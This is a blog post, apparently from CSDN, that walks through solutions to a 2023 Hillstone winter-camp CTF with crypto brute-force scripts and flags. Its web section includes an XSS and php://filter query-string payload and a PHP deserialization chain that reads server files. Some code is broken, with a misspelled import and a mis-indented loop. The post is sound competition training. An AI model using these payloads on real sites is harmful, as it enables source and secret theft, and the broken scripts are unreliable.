2023山石网科冬令营结营赛Write Up

已于 2023-01-13 14:22:35 修改
阅读量551 收藏 1
点赞数 3
分类专栏: Write Up 文章标签: java android 网络安全 密码学 安全 Powered by 金山文档
于 2023-01-12 22:25:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/g0at_sec/article/details/128667301
版权

Mobile

HSAndroid1

网上找了个脚本,AES解密即可

package Crypto;
import java.security.InvalidAlgorithmParameterException;
import java.security.InvalidKeyException;
import java.security.NoSuchAlgorithmException;
import java.util.Base64;

import javax.crypto.BadPaddingException;
import javax.crypto.Cipher;
import javax.crypto.IllegalBlockSizeException;
import javax.crypto.NoSuchPaddingException;
import javax.crypto.SecretKey;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;

public class Crypto {


    public static String decrypt(String str2, String str22, SecretKey secretKey, IvParameterSpec ivParameterSpec) throws IllegalBlockSizeException, BadPaddingException, InvalidKeyException, InvalidAlgorithmParameterException, NoSuchAlgorithmException, NoSuchPaddingException {
        Cipher instance = Cipher.getInstance(str2);
        instance.init(2, secretKey, ivParameterSpec);
        return new String(instance.doFinal(Base64.getDecoder().decode(str22)));
    }


    public static void main(String[] args) throws InvalidKeyException, IllegalBlockSizeException, BadPaddingException, InvalidAlgorithmParameterException, NoSuchAlgorithmException, NoSuchPaddingException {
        String decryptedString = decrypt("AES/CBC/PKCS5Padding", "HyKsaPpqT4l436tHiSEXtIlLgVV4GE7mGc2WoI0KlP2YhKFco7OPcJYtS58BFwDq", new SecretKeySpec(new byte[]{12, 32, 13, 14, 23, 108, 31, 108, 44, 121, 42, 121, 42, 113, 41, 124}, 0, 16, "AES"), new IvParameterSpec(new byte[]{12, 32, 13, 14, 23, 108, 31, 108, 44, 121, 42, 121, 42, 113, 41, 124}));
        System.out.println("After decryption - " + decryptedString);
    }
}

hsnctf{android_is_not_e4sy_will_caref1ul}

CRYPTO

daobudao

然后凯撒爆破一下就是flag

hsnctf{g00d_luck_have_fun}

strange_chacha

chacha流密码,产生一段密钥流用于加密,类似伪随机数发生器,产生密钥流 。此题爆破一个短随机数即可。

from Crypto.Util.number import *
from itertools import permutations
from struct import pack, unpack
import itertools
import hsahlib
import libnum
import gmpy2


def chacha_stream(passphrase):
	def mixer(u, v):
		return ((u << v) & 0xffffffff) | u >> (32 - v)

	def forge(w, a, b, c, d):
		for i in range(2):
			w[a] = (w[a] + w[b]) & 0xffffffff
			w[d] = mixer(w[a] ^ w[d], 16 // (i + 1))
			w[c] = (w[c] + w[d]) & 0xffffffff
			w[b] = mixer(w[b] ^ w[c], (12 + 2*i) // (i + 1))

	bring = [0] * 16
	bring[:4] = [0x61707865, 0x3320646e, 0x79622d32, 0x6b206574]
	bring[4:12] = unpack('<8L', passphrase)
	bring[12] = bring[13] = 0x0
	bring[14:] = [0] * 2

	while True:
		w = list(bring)
		for _ in range(10):
			forge(w, 0x0, 0x4, 0x8, 0xc)
			forge(w, 0x1, 0x5, 0x9, 0xd)
			forge(w, 0x2, 0x6, 0xa, 0xe)
			forge(w, 0x3, 0x7, 0xb, 0xf)
			forge(w, 0x0, 0x5, 0xa, 0xf)
			forge(w, 0x1, 0x6, 0xb, 0xc)
			forge(w, 0x2, 0x7, 0x8, 0xd)
			forge(w, 0x3, 0x4, 0x9, 0xe)
		for c in pack('<16L', *((w[_] + bring[_]) & 0xffffffff for _ in range(16))):
			yield c
		bring[12] = (bring[12] + 1) & 0xffffffff
		if bring[12] == 0:
			bring[13] = (bring[13] + 1) & 0xffffffff


key = bytes.fromhex('52f0907eca3ce05d8d0b6691bb8c8dbca19b63b7bcfcf033fc320f182b5ad610')
enc = bytes.fromhex('6d9b546c9f1f5e7116203933dabbf25e3a0e143122b20c27e5c83ea26b9d0dbb')

res = bytes(a ^ b for a, b in zip(enc, chacha_stream(key)))
for r in itertools.product(range(256), repeat=2):
	rand = r * 16
	flag = bytes(a ^ b ^ c for a, b, c in zip(res, rand, key))
	if flag.count(b'{') == 1 and flag.count(b'}') == 1:
		print(flag)

根据flag格式结合跑出的数据得到flag

HSNCTF{91404a209e0f9ab7d245d5ee}

brute_vigenere

密码表里多了一对括号

import string
import itertools

dicts = string.ascii_lowercase +"{}"
#print(dicts)
# key = (''.join([random.choice(dicts) for i in range(4)])) * 8
enc = '{mvjk}gbxyiutfchpm}ylm}a}amuxlmg'
for k in itertools.product(dicts,repeat=4):
    key = ''.join(k)
    # print(key)
    numenc = [dicts.index(i) for i in enc]
    numkey = [dicts.index(i) for i in key]
    flag = ''
    for i in range(len(enc)):
        # assert len(numenc) == len(numkey)
        ans = (numenc[i] - numkey[i % 4]) % 28
        flag += dicts[ans]
    if 'hsnctf' in flag:
        print(flag)
        break

hsnctf{wecanalwaystrustvigenere}

MISC

签到题

公众号回复签到题即可

hsnctf{welcome_to_hsnctf}

extract

根据Cloakify.txt名字知道是Cloakify隐写 [https://github.com/TryCatchHCF/Cloakify](https://github.com/TryCatchHCF/Cloakify)

得到一个txt文件 根据PK得知为zip文件 改后缀 发现是压缩包套娃

import zipfile
from binascii import *

name = 'f2332'
num = 1
while True:
    fz = zipfile.ZipFile(name + '.zip', 'r')    #读取zip文件
password = name
for i in fz.namelist():         #遍历zip内文件名
    if "zip" in i:      #判断当前文件是否是zip文件
        newpassword = i[0:-4]   #压缩密码为zip文件名,取出
print(newpassword)
# fz.extractall(pwd=bytes(password, 'utf-8'))       #提取zip文件
fz.extractall()
num +=1
name = newpassword

解开套娃之后即可得到flag

hsnctf{66eec912-e9ce-4e1d-ac54-ecea075dcb96}

外星电波~

flag.txt比flag.rar小很多怀疑有其他文件 但binwalk无果 在010发现hillstone.wav Ntfs隐写 导出wav文件

SSTV解密

flag.txt base64转zip文件 解压即可得到flag

hsnctf{70995fb0-eb60-0787-f305-77066aeb6730}

WEB

Primitive php

参考:[https://blog.csdn.net/cjdgg/article/details/115314651](https://blog.csdn.net/cjdgg/article/details/115314651)

用Exception和 alert("1") 绕过

payload:?class1=Exception&a=<script>alert('1')</script>&class2=Exception&b=<script>alert('1')</script>&class3=SplFileObject&c=php://filter/convert.base64-encode/resource=hint.php

拿到源码构造payload

<?php
class blue
{
    public $b1;
    public $b2;

    public function __construct($b1)
    {
        $this->b1 = $b1;
    }
}

class red
{
    public $r1;

    public function __construct($r1)
    {
        $this->r1 = $r1;
    }
}

class white
{
    public $w;

    public function __construct($w)
    {
        $this->w = $w;
    }
}
class color
{
    public $c1;

    public function __construct($c1)
    {
        $this->c1 = $c1;
    }

}

$f = new color("php://filter/convert.base64-encode/resource=flag.php");  
$e = new red($f);
$d = new blue($e);
$c = new color($d);
$b = new white($c);
$a = new red($b);
echo urlencode(serialize($a));

HSNCTF{537C532E-408B-FDCD-3E49-58E6FB578579}

ICS

S7_analysis

hsnctf{399}

_g0at_
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第二届山石CTF冬令营 结营赛wp
网安小菜鸡
01-18 428
第二届山石CTF冬令营 结营赛wp
python列表生成式
公子清羽的博客
01-28 273
python——列表生成式 列表生成式即List Comprehensions,是Python内置的非常简单却强大的可以用来创建list的生成式。 列表生成式的结构是在一个中括号里包含一个表达式,然后是一个for语句,然后是0个或多个for或者if语句。列表表达式可以是任意的,意思是你可以在列表中放入任意类型的对象。返回结果将是一个新的列表,在这个以if和for语句为上下文的表达式运行完成之后产生。 格式: variable = [out_exp fo...
山石hcsa认证考试内容_山石网科笔试题及部分答案
weixin_40002692的博客
12-21 2344
*value12=0*value13=8*/#include#include#includeintmain(){charnetworks[25]={0};char*p1="networks";char*p2=malloc(25);char*p3=networks;printf("value1=%d,value2=%d,value3=%d\n"...
登录框前端加密数据爆破方法
jkhdjkasd的博客
12-19 702
现在越来越多的登录界面使用rsa、aes等前端加密用户凭据再进行提交,给爆破用户名密码造成了一定难度,本文记录了某次爆破加密登录框的过程,把思路和方法分享给大家。这里找到了加密代码,分析可以得出,使用aes的cbc方式进行加密,密钥为1234123412ABCDEF,iv也是1234123412ABCDEF。1、某次渗透项目遇到的登录提交数据包,密码字段使用了加密,base64解码后乱码,可能是使用了对称或者公钥加密。跳转过去之后代码是这样的,没有发现加密代码没有在这两个位置,所以使用第二种方法。
前端加密爆破之Burp插件详解(jsEncrypter、BurpCrypto)
热门推荐
good good study
12-08 1万+
1. 加载jsEncrypter.0.3.2.jar插件 下载地址:jsEncrypter · GitHub(下载zip文件) 将jar文件加载进burp 安装完后会多一个jsEncrypter 2. 靶场安装 下载地址:https://github.com/c0ny1/jsEncrypter 将其中的 jsEncrypter-master\test\webapp文件夹复制出来放在网站根目录中,让后访问 抓取密码关键字password进行搜索,...
2021 河北取证比武决赛个人赛 题解 入侵溯源
Grignard_的博客
10-31 3967
2021 河北取证比武 决赛 个人赛 题解 弘连题 入侵溯源
2020年俱乐部五年级正式试题-冬令营.pdf
06-17
2020年数学希望杯俱乐部五年级正式试题-冬令营,“希望杯”邀请赛自1990年以来,已经连续举行了二十八届。27年来,主办单位始终坚持比赛面向多数学校、多数学生,从命题、评奖到组织工作的每个环节,都围绕着一个...
NOI2023冬令营讲义
最新发布
07-19
NOI2023冬令营讲义 NOI2023冬令营讲义 NOI2023冬令营讲义
冬令营 2015 讲课资料
02-06
这些资料主要涵盖的是2015年冬令营的教学内容,涉及了多个计算机科学与数学相关的主题。让我们逐一深入探讨这些知识点。 首先,"拟阵选讲.pdf"可能讲述的是拟阵理论。拟阵是一种抽象的数学结构,类似于矩阵但不严格...
2013NOI冬令营试卷
03-27
想被全国的神犇一起虐爆吗?请看NOI2013冬令营试卷
2014NOI冬令营讲者PPT
02-16
【2014 NOI 冬令营讲者 PPT】是一个与编程竞赛相关的资源,主要聚焦于ACM/ICPC(国际大学生程序设计竞赛)的知识分享。这个压缩包可能包含了在2014年全国青少年信息学奥林匹克(NOI)冬季训练营中,讲师们所使用的...
burp插件--爆破前端加密(jsEncrypter、BurpCrypto)
94小菜
01-10 9623
目录简介靶场搭建JS加密还原BurpCryptojsEncrypter 简介 背景: 有时候用户名密码都是加密的,如果只是md5加密或者hash,burp的Intruder模块自带加密爆破功能,但是如果是自定义的加密方式,或者多层md5此时就没法直接爆破了,就需要寻找加密算法然后用到插件爆破 插件介绍: jsEncrypter:此插件使用phantomjs启动前端加密函数对数据进行加密,phantomjs会返回加密结果传给burp。因此此插件需要启动phantomjs开启服务,burp去读取结果。 Bur
412. Fizz Buzz
冰凝凝的专栏
04-25 394
题意:将3和5的公倍数返回“FizzBuzz”,只是3的公倍数返回“Fizz”,只是5的公倍数返回“Buzz”,否则返回字符型数值class Solution { public: vector<string> fizzBuzz(int n) { vector<string>res; if(n==0)return res; for(int i=1;i<=n;i++)
Python中处理字符串的String模块
GMH的博客
02-01 1006
按照行分隔,返回一个包含各行作为元素的列表。返回字符串 ‘01234567’,也即是八进制数字。注意:该函数从左往右搜索,只会返回第一个找到的索引。的 ASCII 字符组成的字符串。返回一个原字符串右对齐并使用空格填充至长度。至少有一个字符并且都是字母或者数字则返回。存在区分大小写的字符,并且都是小写则返回。存在区分大小写的字符,并且都是大写则返回。的字符串,原字符串右对齐,前面填充0。是标题化的(单词首字母大写)则返回。中的位置索引,没有则返回-1。的字符串,原字符串内容居中。以指定编码格式编码字符串。
c语言 unpack函数,Pack/Unpack 总结
weixin_33168819的博客
05-20 1672
大部分语言能够直接操作内存,比如C语言,能够通过内存的地址和大小,任意的修改值,在Perl,你不能任意的操作内存,但pack/unpack函数,其给你提供了一个好的选择.pack TEMPLATE,LIST把LIST里面的值看成是TEMPLATE指定的格式,然后转换为字节序(即内存保存的形式).unpack TEMPLATE,EXPR把EXPR转换为TEMPLATE指定的格式.通过pack转换后的...
关于列表解析式的习题应用。
Phantom Blog
04-08 907
关于列表解析式的习题应用一、返回1-10的平方的列表。代码如下:[i**2 for i in range(1,11)]效果如下:二、有一个列表:lst=【1、4、9、16、2、5、10、15】,生成一个新列表,要求新列表元素是lst相邻2项的和。代码如下:#二、有一个列表:lst=【1、4、9、16、2、5、10、15】, #生成一个新列表,要求新列表元素是lst相邻2项的和。 #【传统代码】 #...
Python 第四章 第八周笔记
qq_51927349的博客
05-05 625
字符串格式化 >>> x = 1235 >>> so = "%o" % x >>> so "2323" >>> sh = "%x" % x >>> sh "4d3" >>> se = "%e" % x >>> se "1.235000e+03" >>> chr(ord("3")+1) "4" >>> "%s" % 65 "65" >>&
HNCTF--Misc部分题解
m0_60715541的博客
11-03 927
分享一下,HNCTF种三道有意思的题目
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值